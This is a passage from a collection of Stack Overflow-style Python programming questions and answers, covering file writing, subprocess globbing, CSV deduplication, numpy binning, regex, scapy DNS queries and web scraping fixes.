entry = __import__(self.module_name, globals(),globals(), ['__name__'])
File "/System/Library/Frameworks/Python.framework/Versions/2.7/Extras/lib/python/setuptools/__init__.py", line 11, in
from setuptools.extension import Extension
File "/System/Library/Frameworks/Python.framework/Versions/2.7/Extras/lib/python/setuptools/extension.py", line 5, in
from setuptools.dist import _get_unpatched
File "/System/Library/Frameworks/Python.framework/Versions/2.7/Extras/lib/python/setuptools/dist.py", line 15, in
from setuptools.compat import numeric_types, basestring
File "/System/Library/Frameworks/Python.framework/Versions/2.7/Extras/lib/python/setuptools/compat.py", line 17, in
import httplib
File "/System/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/httplib.py", line 80, in
import mimetools
File "/System/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/mimetools.py", line 6, in
import tempfile
File "/System/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/tempfile.py", line 35, in
from random import Random as _Random
File "/System/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/random.py", line 49, in
import hashlib as _hashlib
File "build/bdist.macosx-10.11-intel/egg/hashlib.py", line 115, in
"""
TypeError: 'frozenset' object is not callable
What can I do with this?
Answer: Removal of this package have helped me:
sudo rm -rf /Library/Python/2.7/site-packages/hashlib-20081119-py2.7-macosx-10.11-intel.egg
|
remove extra newline when writing to a file
Question: This little script writes keywords to a file, but adds an extra newline
between each keyword. How do I make it stop? I.e. instead of
Apple
Banana
Crayon
I want
Apple
Banana
Crayon
I tried Googling "listwrite" but didn't help.
I am sure this is a very simple thing but I can't figure it out.
#!/usr/local/bin/python
###################################################
# nerv3.py
# Goal: Named entity recognition script to pull names/place from text
# called as python nerv3.py text_path_or_file
#
# Inputs:
# path - text file or directory containing text files
# output - output file name
# uuid
# Outputs:
# Output file written
# People, Places, Others files
#
###################################################
#gonna need to install AlchemyAPI
import AlchemyAPI
import argparse
import xml.etree.ElementTree as ET
import collections
import codecs
import os
#from IPython import embed
#=================================================
def listwrite(output_file,thelist):
for item in thelist:
item.encode('utf-8')
output_file.write("%s\n\n" % item)
#=================================================
def main():
tmpdir = "/tmp/pagekicker"
#personal api key saved as api_key.txt
parser = argparse.ArgumentParser()
parser.add_argument('path', help = "target file or directory for NER")
parser.add_argument('output', help = "target file for output")
parser.add_argument('uuid', help = "uuid")
args = parser.parse_args()
in_file = args.path
out_file = args.output
uuid = args.uuid
folder = os.path.join(tmpdir, uuid)
print folder
cwd = os.getcwd()
apikey_location = os.path.join(cwd, "api_key.txt")
with open(in_file) as f:
text = f.read()
alchemyObj = AlchemyAPI.AlchemyAPI()
alchemyObj.loadAPIKey(apikey_location)
result = alchemyObj.TextGetRankedNamedEntities(text)
root = ET.fromstring(result)
place_list = ['City', 'Continent', 'Country', 'Facility', 'GeographicFeature',\
'Region', 'StateOrCounty']
People = {}
Places = {}
Other = {}
for entity in root.getiterator('entity'):
if entity[0].text == 'Person':
People[entity[3].text]=[entity[1].text, entity[2].text]
elif entity[0].text in place_list:
Places[entity[3].text] = [entity[1].text, entity[2].text]
else:
Other[entity[3].text] = [entity[1].text, entity[2].text]
#print lists ordered by relevance
Places_s = sorted(Places, key = Places.get, reverse = True)
People_s = sorted(People, key = People.get, reverse = True)
Other_s = sorted(Other, key = Other.get, reverse = True)
# here is where things seem to go awry
with codecs.open(out_file, mode = 'w', encoding='utf-8') as o:
listwrite(o, People_s)
listwrite(o, Places_s)
listwrite(o, Other_s)
out_file = os.path.join(folder, 'People')
with codecs.open(out_file, mode= 'w', encoding='utf-8') as o:
listwrite(o, People_s)
out_file = os.path.join(folder, 'Places')
with codecs.open(out_file, mode= 'w', encoding='utf-8') as o:
listwrite(o, Places_s)
out_file = os.path.join(folder, 'Other')
with codecs.open(out_file, mode= 'w', encoding='utf-8') as o:
listwrite(o, Other_s)
#=================================================
if __name__ == '__main__':
main()
Answer:
def listwrite(output_file,thelist):
for item in thelist:
item.encode('utf-8')
output_file.write("%s\n\n" % item)
In the code, listwrite is defined as a function. For every `item` in
`thelist`, it writes the `item`, followed by two newline characters. To remove
the extra line, simply remove one of the `\n`s.
def listwrite(output_file,thelist):
for item in thelist:
item.encode('utf-8')
output_file.write("%s\n" % item)
|
Python: subprocess call doesn't recognize * wildcard character?
Question: I want to remove all the *.ts in file. `os.remove` didn't work.
And this doesn't expand `*`
>>> args = ['rm', '*.ts']
>>> p = subprocess.call(args)
rm: *.ts No such file or directory
Answer: The `rm` program takes a list of filenames, but `*.ts` isn't a list of
filenames, it's a pattern for matching filenames. You have to name the actual
files for `rm`. When you use a shell, the shell (but not `rm`!) will expand
patterns like `*.ts` for you. In Python, you have to explicitly ask for it.
import glob
import subprocess
subprocess.check_call(['rm', '--'] + glob.glob('*.ts'))
# ^^^^ this makes things much safer, by the way
Of course, why bother with `subprocess`?
import glob
import os
for path in glob.glob('*.ts'):
os.remove(path)
|
converting char to list in R
Question: I wrote a python script for reading mails' content and append to list and
calling this python script in R. The problem is R is considering the list as
one instead of two elements in it.
Here is my python script:
{
import sys
import string
import glob
def parseOutText(f):
f.seek(0)
all_text = f.read()
### split off metadata
content = all_text.split("Bcc:")
return content
def main():
path = "D:/Hadoop/practice/machine_learning/mails/*.txt"
files = glob.glob(path)
file_list = []
for each_file in files:
ff = open(each_file, "r")
text = parseOutText(ff)
#text = sys.stdout.write(ff.read())
file_list.append(text)
ff.close()
print(file_list)
print(len(file_list))
}
and the output for this.
> [['From: xxx@xxx.com\nTo: xyz@xxx.com\nSubject: Hi\nCc: abc@xxx.com\nMime-
> Version: 1.0\nContent-Transfer-Encoding: 7bit\n', '
> test@xxx.com\n\nHi,\n\nYour problem is resolved. \n\nPlease reply to this
> email and let us know if it is not working.\n\nThank you \nCCD.'], ['From:
> abc@xxx.com\nTo: test2@xxx.com\nSubject: Hi\nCc: xyz@xxx.com\nMime-Version:
> 1.0\nContent-Transfer-Encoding: 7bit\n', ' test@xxx.com\n\nHi,\n\nThis will
> not work out unless and until you work harder.\n\nThank you \nCCD.']] 2
R code:
#setting the working directory to the mails folder
setwd("D:/Hadoop/practice/machine_learning/mails")
command = "python"
output = as.list(system2(command, args = "D:/Hadoop/practice/machine_learning/mails/testR.py", stdout = TRUE))
print(output)
print(length(output))
print(str(output))
str(command)
R output:
> [[1]] [1] "[['From: xxx@xxx.com\nTo: xyz@xxx.com\nSubject: Hi\nCc:
> abc@xxx.com\nMime-Version: 1.0\nContent-Transfer-Encoding: 7bit\n', '
> test@xxx.com\n\nHi,\n\nYour problem is resolved. \n\nPlease reply to this
> email and let us know if it is not working.\n\nThank you \nCCD.'], ['From:
> abc@xxx.com\nTo: test2@xxx.com\nSubject: Hi\nCc: xyz@xxx.com\nMime-Version:
> 1.0\nContent-Transfer-Encoding: 7bit\n', ' test@xxx.com\n\nHi,\n\nThis will
> not work out unless and until you work harder.\n\nThank you \nCCD.']]"
>
> print(length(output)) [1] 1
How can I get two mails as two elements in the same list?
mails:
From: xxx@xxx.com
To: xyz@xxx.com
Subject: Hi
Cc: abc@xxx.com
Mime-Version: 1.0
Content-Transfer-Encoding: 7bit
Bcc: test@xxx.com
Hi,
Your problem is resolved.
Please reply to this email and let us know if it is not working.
Thank you
CCD.
2nd mail:
From: abc@xxx.com
To: test2@xxx.com
Subject: Hi
Cc: xyz@xxx.com
Mime-Version: 1.0
Content-Transfer-Encoding: 7bit
Bcc: test@xxx.com
Hi,
This will not work out unless and until you work harder.
Thank you
CCD.
Answer:
l = as.list(cbind(text1, text2))
Gives me the following output:
[[1]]
[1] " From: xxx@xxx.com\nTo: xyz@xxx.com\nSubject: Hi\nCc: abc@xxx.com\nMime-Version: 1.0\nContent-Transfer-Encoding: 7bit\nBcc: test@xxx.com\n\nHi,\n\nYour problem is resolved. \n\nPlease reply to this email and let us know if it is not working.\n\nThank you \nCCD."
[[2]]
[1] "From: abc@xxx.com\nTo: test2@xxx.com\nSubject: Hi\nCc: xyz@xxx.com\nMime-Version: 1.0\nContent-Transfer-Encoding: 7bit\nBcc: test@xxx.com\n\nHi,\n\nThis will not work out unless and until you work harder.\n\nThank you \nCCD."
|
docker container not able to write on host machine
Question: If I run the following code, I can convert the csv file into a format that I
require.
import csv
import json
csvfile = open('/tmp/head.csv', 'r')
jsonfile = open('/tmp/file.json', 'w')
fieldnames = ("user","messageid","destination","col1", "col2", "code1","code2", "mydate", "status")
reader = csv.DictReader( csvfile, fieldnames)
for row in reader:
jsonfile.write(json.dumps(row))
When I run the code at command prompt, it works.
python covert.py
But if I create docker container, ubuntu refused to write to the disk.
alias python34='docker run -i -v "$(pwd)":/tmp/ --rm shantanuo/pyrun:3.4 python "$@"'
python34 /tmp/convert.py
I got segmentation fault error. I tried disabling ubuntu firewall using
sudo ufw disable
I tried removing apparmour. But I am still not able to write to /tmp/ folder
of host machine through python container.
This is ubuntu specific issue. I am able to use the same alias on Amazon Linux
ec2 instance.
Answer: This was because the container (pyrun) that I was using was not optimized to
handle large files. When I used the default python image, it worked.
docker run -it --rm -v "$PWD":/usr/src/myapp -w /usr/src/myapp python:3 python convert.py
|
Python - dig ANY equivalent with scapy module
Question: I want to use the python module scapy to perform an equivalent command of
dig ANY google.com @8.8.4.4 +notcp
I've made a simple example code:
from scapy.all import *
a = sr(IP(dst="8.8.4.4")/UDP(sport=RandShort(),dport=53)/DNS(qd=DNSQR(qname="google.com",qtype="ALL",qclass="IN")))
print str(a[0])
And it send and recieve a packet, but when I sniffed the packet the response
says `Server failure`.
[Wireshark Screenshot - scapy](http://i.stack.imgur.com/Ug2Al.png)
[Wireshark Screenshot - dig](http://i.stack.imgur.com/bt1sw.png)
Sniffing the `dig` command itself, looks nearly the same but it gives me a
correct response and also it does not send another `ICMP - Destination
unreachable` Packet.. this only comes up when sending it with scapy.
If you need more information, feel free to ask. Maybe someone can help me with
this..
**EDIT:**
Maybe the `ICMP - Destination unreachable` packet were send because `8.8.4.4`
tries to send the response to my `sport`, wich is closed? But why should `dig`
then work?!
Answer: Got the Python code working with scapy..
srp(Ether()/IP(src="192.168.1.101",dst="8.8.8.8")/UDP(sport=RandShort(),dport=53)/DNS(rd=1,qd=DNSQR(qname="google.com",qtype="ALL",qclass="IN"),ar=DNSRROPT(rclass=3000)),timeout=1,verbose=0)
In Wireshark we can see now a correct response: [Wireshark
Screenshot](http://i.stack.imgur.com/UKtIq.png)
But I'm still getting the `ICMP - Destination unreachable` packet.. and I
don't know why..
|
Write dictionary to csv with one line per value
Question: I am quite new to Python so please excuse me if this is a really basic
question. I have a Python dictionary such as this one:
`foo = {'bar1':['a','b','c'], 'bar2':['d','e']}`
I would like to write it to a csv file, with one line per **value** and the
key as first element of each row. The output would be (whatever the quotation
marks):
bar1,'a'
bar1,'b'
bar1,'c'
bar2,'d'
bar2,'e'
I have tried this [such as suggested
here](http://stackoverflow.com/questions/8685809/python-writing-a-dictionary-
to-a-csv-file-with-one-line-for-every-key-value)
import csv
with open('blah.csv', 'wb') as csv_file:
writer = csv.writer(csv_file)
for key, value in foo.items():
writer.writerow([key, value])
but this gives the following output, with one line per **key** :
bar1,"['a', 'b', 'c']"
bar2,"['d', 'e']"
Thanks for your help!
Answer: This is because `[key, value]` contains multiple "values" within `value`. Try
iterating over this like this:
for key, values in foo.items()
for value in values:
writer.writerow([key, value])
|
python edge detector - mask the area were it's completly black
Question: I have used canny edge detector on an image. It detected some areas in the
image and other areas it displays nothing. Now, I want that on the original
image it would mask the areas that were completely black. How can I do it?
I am using python and skimage or opencv (doesn't matter which one)
from skimage.feature import canny
from skimage.morphology import closing
import skimage.io
import numpy as np
import os
import matplotlib.pyplot as plt
import cv2
img = skimage.io.imread("test.jpg",as_grey=True)
fig, ax = plt.subplots(1, 1, figsize=(20,20))
ax.imshow(img,'gray')
ax.set_axis_off()
plt.show()
edges = canny(img)
close = closing(edges)
fig, ax = plt.subplots(1, 1, figsize=(20,20))
ax.imshow(close,'gray')
ax.set_axis_off()
plt.show()
[![Original
Image](http://i.stack.imgur.com/osYuB.jpg)](http://i.stack.imgur.com/osYuB.jpg)
[![After canny and
closing](http://i.stack.imgur.com/hbkMt.png)](http://i.stack.imgur.com/hbkMt.png)
Now what I want is that the white part(in the second image) would be the only
part that would be displayed in the original image ( Masking )
Answer: You can simply apply a binary mask on a RGB image using:
close_BGR = cv2.cvtColor(close, cv2.COLOR_GRAY2BGR)
# Assuming that the img is of RGB format
masked_image = cv2.min(close_BGR, img)
|
Cant access instance variable from another class
Question: I have checked many questions replied here, but can't access an instance
variable from another class(I have tried
[this](http://stackoverflow.com/questions/19993795/how-would-i-access-
variables-from-one-class-to-another) as example)
#in file: view.py
class treeview():
def __init__(self):
....(no mention of row_num)
def viewer(self, booklist, act=-1):
row_num = len(treeview().full_list)
print(row_num) # prints the correct value, which is > 0
return row_num
#in main file
class Window(Gtk.ApplicationWindow):
def __init__(self, application, giofile=None):
self.TreeView = view.treeview()
def extract_data_from_cr(self, select_button):
print(self.TreeView.row_num)
Gives error:
AttributeError: 'treeview' object has no attribute 'row_num'
If I try to add `row_num` inside treeview() as:
class treeview():
def __init__(self):
self.row_num = 0
def viewer(self, booklist, act=-1):
self.row_num = len(treeview().full_list)
print(self.row_num)
# return row_num
then, `print(self.TreeView.row_num)` in `main` always yields `0`.
I cant find whats going wrong here.Kindly help.
**After Mitch's comment** if I define row_num without calling treeview() again
as:
class treeview():
def __init__(self):
self.row_num = 0
def viewer(self, booklist, act=-1):
self.row_num = len(self.bookstore)
print(type(self.bookstore)) # <class 'gi.overrides.Gtk.ListStore'>
print(self.row_num) # 5 (expected for a particular case)
Now, when calling the `def extract_data_from_cr`, I am expecting this number:
def extract_data_from_cr(self, select_button):
print(self.TreeView.row_num) #is giving 0
**A MCVE**
$cat mcve.py
class classA():
def __init__(self):
self.row_num = 0
print("HiA")
def define(self):
la = ["A", "B", "C"]
self.row_num = len(la)
print(self.row_num) #prints 3 when get called from mcve2
return(self.row_num)
classA().define()
and
$cat mcve2.py
#!/usr/bin/python
import mcve
class classB():
def get_val(self):
self.MCVE = mcve.classA()
print("Hi2")
print(self.MCVE.row_num) #prints 0
classB().get_val()
Result:
python3 mcve2.py
HiA
3
HiA
Hi2
0
I know. if I call `ClassA.define()` explicitely from `ClassB.get_val()`, I
will get the desired value. But I am looking for transfaring the value it got
(`Result: line 2`)
Answer: _Working from your edited MCVE:_
When you set `self.MCVE = classA()` in the `get_val` method, you are setting
`MCVE` to be a _new instance_ of `classA`. Hence, any modifications to the
`row_num` attribute of some other instance of `classA` are irrelevant.
e.g. `classA().define()` is modifying the `row_num` attribute for an entirely
different class instance. Its `row_num` is an instance variable which is only
defined for _that particular instance_.
Should you want the `row_num` attribute to persist across all `classA`
instances, you would want to set it as a class variable, like so (bit of a
nonsensical example though).
class classA():
row_num = 0
def __init__(self):
print("HiA")
def define(self):
la = ["A", "B", "C"]
classA.row_num = len(la)
print(classA.row_num) #prints 3 when get called from mcve2
return classA.row_num
classA().define()
class classB():
def get_val(self):
self.MCVE = classA()
print("Hi2")
print(self.MCVE.row_num) #prints 0
classB().get_val()
**Outputs** :
HiA
3
HiA
Hi2
3
You otherwise may be looking to use a `property`, which could be set in the
`__init__` of the class.
|
Installing a package in Conda environment, but only works in Python not iPython?
Question: I am using an Ubuntu docker image. I've installed Anaconda on it with no
issues. I'm not trying to install tensorflow, using the directions on the
tensorflow website:
conda create --name tensorflow python=3.5
source activate tensorflow
<tensorflow> conda install -c conda-forge tensorflow
It installs with no errors. However, when I import in `iPython`, it tells me
there is no module `tensorflow`. But if I import when in `Python`, it works
fine.
What's going on and how do I fix it?
Answer: You have to install IPython in the conda environment
source activate tensorflow
conda install ipython
|
Python: How to detect a particular number inside a long serial number
Question: I have been working on this project, a small Python and Tkinter project as I'm
a beginner and I almost finished it if it weren't for this little issue I have
with it that I detected after doing a few tests. The program should say
whether a serial number that I entered in an input is a "devil number" or not
depending on whether the number does have the number "666" in it or not. in
the positive case, there should be the number "666" in it and it should away
from other 6s, which means there shouldn't be something like this "666". If
the number "666" is repeated several times inside the serial number (without
being stuck together "666666") it can be considered a devil number too.
The issue I have is that when I test numbers that only have one "666" within
them and that at the same time end with that number (666), those numbers are
not considered as devil numbers while they should be. I can't seem to solve
this problem.
To realise this project, I used Python and Tkinter. The code is as follows:
"""*************************************************************************"""
""" Author: CHIHAB Version: 2.0 Email: chihab2007@gmail.com """
""" Purpose: Practice Level: Beginner 2016/2017 """
"""*************************************************************************"""
############################ I M P O R T S#####################################
from tkinter import*
from types import *
############################ T K I N T E R ####################################
main = Tk()
e = Entry(main, bg="darkblue", fg="white")
e.pack(fill=X)
l = Label(main, bg="blue", fg="yellow")
l.pack(fill=X)
############################ F U N C T I O N S ################################
def devil(x): #TEST ENTERED VALUE FOR DEVIL NUMBER
c = 0
i = 0
l = list(x)
while i < len(l): #This block of code means that as long as the index i
if l[i] == "6": # is below the length of the list to which we have
c = c+1 # converted the entry, the program is allowed to keep
print("this is c :", c) # reading through the list's characters.
else:
c = 0
if i <= (len(l)-2) and c == 3 and l[i+1] != "6":
return True
i = i+1
return False
def printo(): #GET VALUE ENTRY AND SHOW IT IN LABEL
x = e.get()
if x != "":
if x.isnumeric() == True: #SHOW ENTERED VALUE IF INTEGER
y = devil(x)
if y == True:
print("The number you entered is a devil number.")
l.config(text="The number you entered is a devil number.", bg="blue")
else:
print("The number you entered is NOT a devil number.")
l.config(text="The number you entered is NOT a devil number.", bg="blue")
#print(x)
e.delete(0, END)
else: #SHOW ERROR IF NOT INTEGER
l.config(text="please enter an integer in the entry.", bg="red")
print("please enter an integer in the entry.")
e.delete(0, END)
else: #SHOW ERROR IF EMPTY
l.config(text="please enter something in the entry.", bg="red")
print("please enter something in the entry.")
############################ T K I N T E R ####################################
b = Button(main, text="Go", bg="lightblue", command=printo)
b.pack(fill=X)
main.mainloop()
Here you go, guyz. I hope my code is neat enough and that you would be able to
help me which I have no doubt about. Thank you.
Answer: If you mean that `666`, found anywhere in the number should be a match, then
it's very simple:
if '666' in '1234666321':
print("It's a devil's number")
However, you say that `666` must be a "lone" `666`, i.e. exactly three `6`
side by side, no more, no less. Neither two, nor four. Five `6`'s are right
out. In that case, I would use [tobias_k's
regex](http://stackoverflow.com/a/38769806/344286).
Though, if you had a passionate hatred for regex, you _could_ do it using
`string.partition`:
def has_devils_number(num):
start, mid, end = num.partition('666')
if not mid:
return False
else:
if end == '666':
return False
elif start.endswith('6') or end.startswith('6'):
return has_devils_number(start) or has_devils_number(end)
return True
Here's what the performance looks like:
>>> x = '''
... import re
... numbas = ['666', '6', '123666', '12366', '66123', '666123', '666666', '6666', '6'*9, '66661236666']
...
... def devil(x):
... return re.search(r"(?:^|[^6])(666)(?:[^6]|$)", x) is not None
... '''
>>> import timeit
>>> timeit.timeit('[devil(num) for num in numbas]', setup=x)
13.822128501953557
>>> x = '''
... numbas = ['666', '6', '123666', '12366', '66123', '666123', '666666', '6666', '6'*9, '6666123
666']
... def has_devils_number(num):
... start, mid, end = num.partition('666')
... if not mid:
... return False
... else:
... if end == '666':
... return False
... elif start.endswith('6') or end.startswith('6'):
... return has_devils_number(start) or has_devils_number(end)
... return True
... '''
>>> timeit.timeit('[has_devils_number(num) for num in numbas]', setup=x)
9.843224229989573
I'm as surprised as you are.
|
Trying to add numbers from a file subtrack them and put them into another file
Question:
file = open("byteS-F_FS_U.toff","r")
f = file.readline()
s = file.readline()
file.close()
f = int(f)
s = int(s)
u = s - f
file = open("bytesS-F_FS_U","w")
file.write(float(u) + '\n')
file.close()
This is what its says when I run the code :
f file.write(float(u) + '\n') TypeError:
unsupported operand type(s) for +: 'float' and 'str'
I am trying to load numbers from a file that gets new numbers every few
seconds. When they're loaded they're subtracted and put into another file. I
am a new python Programmer.
Answer: First, you need to put full path of the file you're trying to open!
With that first thing fixed, I created a loop program which opens the file
every 10 seconds and writes the result to the other file. Exceptions are
handled so if another process is writing in the file while being opened/read
it does not crash. Python 3 syntax.
import time
while True:
try:
file = open(r"fullpath_to_your_file\byteS-F_FS_U.toff","r")
f = int(file.readline())
s = int(file.readline())
file.close()
except Exception as e:
# file is been written to, not enough data, whatever: ignore (but print a message)
print("read issue "+str(e))
else:
u = s - f
file = open(r"fullpath_to_your_file\bytesS-F_FS_U","w") # update the file with the new result
file.write(str(u) + '\n')
file.close()
time.sleep(10) # wait 10 seconds
|
rebinning a list of numbers in python
Question: I've a question about rebinning a list of numbers, with a desired bin-width.
It's basically what a frequency histogram does, but I don't want the plot,
just the bin number and the number of occurrences for each bin.
So far I've already written some code that does what I want, but it's not very
efficient. Given a list `a`, in order to rebin it with a bin-width equal to 3,
I've written the following:
import os, sys, math
import numpy as np
# list of numbers
a = list(range(3000))
# number of entries
L = int(len(a))
# desired bin width
W = 3
# number of bins with width W
N = int(L/W)
# definition of new empty array
a_rebin = np.zeros((N, 2))
# cycles to populate the new rebinned array
for n in range(0,N):
k = 0
for i in range(0,L):
if a[i] >= (W*n) and a[i] < (W+W*n):
k = k+1
a_rebin[n]=[W*n,k]
# print
print a_rebin
Now, this does exactly what I want, but I think it's not so smart, as it reads
the whole list `N` times, with `N` number of bins. It's fine for small lists.
But, as I have to deal with very large lists and rather small bin-widths, this
translates into huge values of `N` and the whole process takes a very long
time (hours...). Do you have any ideas to improve this code? Thank you in
advance!
Answer: If you use `a = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9]`, your solution is:
> [[ 0. 3.]
> [ 3. 3.]
> [ 6. 3.]]
How you interpret this? The intervals are 0..2, 3..5, 6..8? I think you are
missing something.
Using
[numpy.histogram()](http://docs.scipy.org/doc/numpy/reference/generated/numpy.histogram.html)
hist, bin_edges = numpy.histogram(a, bins=int(len(a)/W))
print(hist)
print(bin_edges)
**Output:**
> [3 3 4]
> [ 0. 3. 6. 9.]
We have 4 values in bin_edges: 0, 3, 6 and 9. All but the last (righthand-
most) bin is half-open. It means we have 3 intervals [0,3), [3,6) and [6,9]
and we have 3, 3 and 4 elements in each bin.
You can define your own bins.
import numpy
a = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9]
bins=[0,1,2]
hist, bin_edges = numpy.histogram(a, bins=bins)
print(hist)
print(bin_edges)
**Output:**
> [1 2]
> [0 1 2]
Now you have 1 element in [0 ,1) and 2 elements in [1,2].
|
NumPy/Pandas: convert array of "steps" into bool mask
Question: I have an array like this:
arr = np.array([4, 6, 3, 9, 2, 100, 3, 1, 1, 1, 1])
I want to convert it to a bool array like this:
[ T, F, F, F, T, F, T, F, F, T, T]
# 4, 6, 3, 9, 2, 100, 3, 1, 1, 1, 1
I can do it with a loop like this:
mask = np.zeros(len(arr), dtype=bool)
ii = 0
while ii < len(arr):
mask[ii] = True
ii += arr[ii]
It's sort of an indirect indexing scheme, where each element in the input
tells us how many subsequent elements are invalid.
How can I do it without using a Python loop, so that it will be fast if the
input array is large? I'm happy to use Pandas too.
Answer: There may be some vectorization trick I'm not thinking of, but if you can use
`numba`, it's well suited for problems like this - this loop should now be
very fast.
import numba
@numba.jit(nopython=True)
def jump_mask(arr):
mask = np.zeros(len(arr), dtype=np.bool_)
ii = 0
while ii < len(arr):
mask[ii] = True
ii += arr[ii]
return mask
|
Undefined index: HTTP_ACCEPT_LANGUAGE using BeatifulSoup/Python
Question: I'm learning Python and I'm trying to parse a webpage made with PHP using
BeautifulSoup. My problem is my script show this error:
<div style="border:1px solid #990000;padding-left:20px;margin:0 0 10px 0;">
<h4>A PHP Error was encountered</h4>
<p>Severity: Notice</p>
<p>Message: Undefined index: HTTP_ACCEPT_LANGUAGE</p>
<p>Filename: hooks/detecta_idioma.php</p>
<p>Line Number: 110</p>
</div>
when I try to do this
html = urllib.urlopen(url).read()
web = BeautifulSoup(html,'html.parser')
print web
etiquetas = web('a')
I thought that this error for executing my script by command line instead of
using a web browser but, executing this script from Apache, I have the same
error.
Anyone know how can I define that for parsing the url?
Answer: Looks like the page requires you to have the `Accept-Language` header passed
along with your request. Here is an example how to do that with
[`requests`](http://docs.python-requests.org/en/master/):
import requests
url = "my url"
response = requests.get(url, headers={"Accept-Language": "en-US,en"})
html = response.content
web = BeautifulSoup(html, 'html.parser')
|
Getting TypeError with speech_recognition module in Python
Question: I want to convert speech to text in real time using the module
`SpeechRecognition 3.4.6` I've installed everything and now I am trying a
simple code from example, here's the code:
import speech_recognition as sr
# obtain audio from the microphone
r = sr.Recognizer()
with sr.Microphone() as source:
print("Say something!")
audio = r.listen(source)
# recognize speech using Sphinx
try:
print("Sphinx thinks you said " + r.recognize_sphinx(audio))
except sr.UnknownValueError:
print("Sphinx could not understand audio")
except sr.RequestError as e:
print("Sphinx error; {0}".format(e))
I am getting error at line `audio = r.listen(source)`, the error traceback is:
Traceback (most recent call last):
File "sr.py", line 4, in <module>
audio = r.listen(source) # listen for the first phrase and extract it into audio data
File "/usr/local/lib/python2.7/dist- packages/speech_recognition/__init__.py", line 493, in listen
buffer = source.stream.read(source.CHUNK)
File "/usr/local/lib/python2.7/dist-packages/speech_recognition/__init__.py", line 139, in read
return self.pyaudio_stream.read(size, exception_on_overflow = False)
File "/usr/local/lib/python2.7/dist-packages/pyaudio.py", line 608, in read
return pa.read_stream(self._stream, num_frames, exception_on_overflow)
TypeError: function takes exactly 2 arguments (3 given)
Answer: You need to install pyaudio 0.2.9, it seems you have older version
|
Remove duplicate rows from CSV
Question: I have a CSV file that looks like this
red,75,right
red,344,right
green,3,center
yellow,3222,right
blue,9,center
black,123,left
white,68,right
green,47,left
purple,48,left
purple,988,right
pink,2677,left
white,34,right
I am using Python and am trying to remove rows that have duplicate in cell 1.
I know I can achieve this using something like pandas but I am trying to do it
using standard python CSV library.
Expected Result is...
red,75,right
green,3,center
yellow,3222,right
blue,9,center
black,123,left
white,68,right
purple,988,right
pink,2677,left
Anyone have an example?
Answer: You can simply use a dictionary where the color is the key and the value is
the row. Ignore the color if it is already in the dictionary, otherwise add it
and write the row to a new csv file.
import csv
file_in = 'input_file.csv'
file_out = 'output_file.csv'
with open(file_in, 'rb') as fin, open(file_out, 'wb') as fout:
reader = csv.reader(fin)
writer = csv.writer(fout)
d = {}
for row in reader:
color = row[0]
if color not in d:
d[color] = row
writer.writerow(row)
result = d.values()
result
# Output:
# [['blue', '9', 'center'],
# ['pink', '2677', 'left'],
# ['purple', '48', 'left'],
# ['yellow', '3222', 'right'],
# ['black', '123', 'left'],
# ['green', '3', 'center'],
# ['white', '68', 'right'],
# ['red', '75', 'right']]
And the output of the csv file:
!cat output_file.csv
# Output:
# red,75,right
# green,3,center
# yellow,3222,right
# blue,9,center
# black,123,left
# white,68,right
# purple,48,left
# pink,2677,left
|
Regex to strip only start of string
Question: I am trying to match phone number using regex by stripping unwanted prefixes
like 0, *, # and +
e.g.
+*#+0#01231340010
should produce,
1231340010
I am using python re module
I tried following,
re.sub(r'[0*#+]', '', '+*#+0#01231340010')
but it is removing later 0s too.
I tried to use regex groups, but still it's not working ( or I am doing
something wrong for sure ).
Any help will be appreciated.
Thanks in advance.
Answer: Add the start of the string check (`^`) and `*` quantifier (0 or more
occurences):
>>> re.sub(r'^[0*#+]*', '', '+*#+0#01231340010')
'1231340010'
Or, a non-regex approach using
[`itertools.dropwhile()`](https://docs.python.org/2/library/itertools.html#itertools.dropwhile):
>>> from itertools import dropwhile
>>> not_allowed = {'0', '*', '#', '+'}
>>> ''.join(dropwhile(lambda x: x in not_allowed, s))
'1231340010'
|
Scraping text from multiple web pages in Python
Question: I've been tasked to scrape all the text off of any webpage a certain client of
ours hosts. I've managed to write a script that will scrape the text off a
single webpage, and you can manually replace the URL in the code each time you
want to scrape a different webpage. But obviously this is very inefficient.
Ideally, I could have Python connect to some list that contains all the URLs I
need and it would iterate through the list and print all the scraped text into
a single CSV. I've tried to write a "test" version of this code by creating a
2 URL long list and trying to get my code to scrape both URLs. However, as you
can see, my code only scrapes the most recent url in the list and does not
hold onto the first page it scraped. I think this is due to a deficiency in my
print statement since it will always write over itself. Is there a way to have
everything I scraped held somewhere until the loop goes through the entire
list AND then print everything.
Feel free to totally dismantle my code. I know nothing of computer languages.
I just keep getting assigned these tasks and use Google to do my best.
import urllib
import re
from bs4 import BeautifulSoup
data_file_name = 'C:\\Users\\confusedanalyst\\Desktop\\python_test.csv'
urlTable = ['url1','url2']
def extractText(string):
page = urllib.request.urlopen(string)
soup = BeautifulSoup(page, 'html.parser')
##Extracts all paragraph and header variables from URL as GroupObjects
text = soup.find_all("p")
headers1 = soup.find_all("h1")
headers2 = soup.find_all("h2")
headers3 = soup.find_all("h3")
##Forces GroupObjects into str
text = str(text)
headers1 = str(headers1)
headers2 = str(headers2)
headers3 = str(headers3)
##Strips HTML tags and brackets from extracted strings
text = text.strip('[')
text = text.strip(']')
text = re.sub('<[^<]+?>', '', text)
headers1 = headers1.strip('[')
headers1 = headers1.strip(']')
headers1 = re.sub('<[^<]+?>', '', headers1)
headers2 = headers2.strip('[')
headers2 = headers2.strip(']')
headers2 = re.sub('<[^<]+?>', '', headers2)
headers3 = headers3.strip('[')
headers3 = headers3.strip(']')
headers3 = re.sub('<[^<]+?>', '', headers3)
print_to_file = open (data_file_name, 'w' , encoding = 'utf')
print_to_file.write(text + headers1 + headers2 + headers3)
print_to_file.close()
for i in urlTable:
extractText (i)
Answer: Try this, 'w' will open the file with a pointer at the the beginning of the
file. You want the pointer at the end of the file
`print_to_file = open (data_file_name, 'a' , encoding = 'utf')`
here is all of the different read and write modes for future reference
The argument mode points to a string beginning with one of the following
sequences (Additional characters may follow these sequences.):
``r'' Open text file for reading. The stream is positioned at the
beginning of the file.
``r+'' Open for reading and writing. The stream is positioned at the
beginning of the file.
``w'' Truncate file to zero length or create text file for writing.
The stream is positioned at the beginning of the file.
``w+'' Open for reading and writing. The file is created if it does not
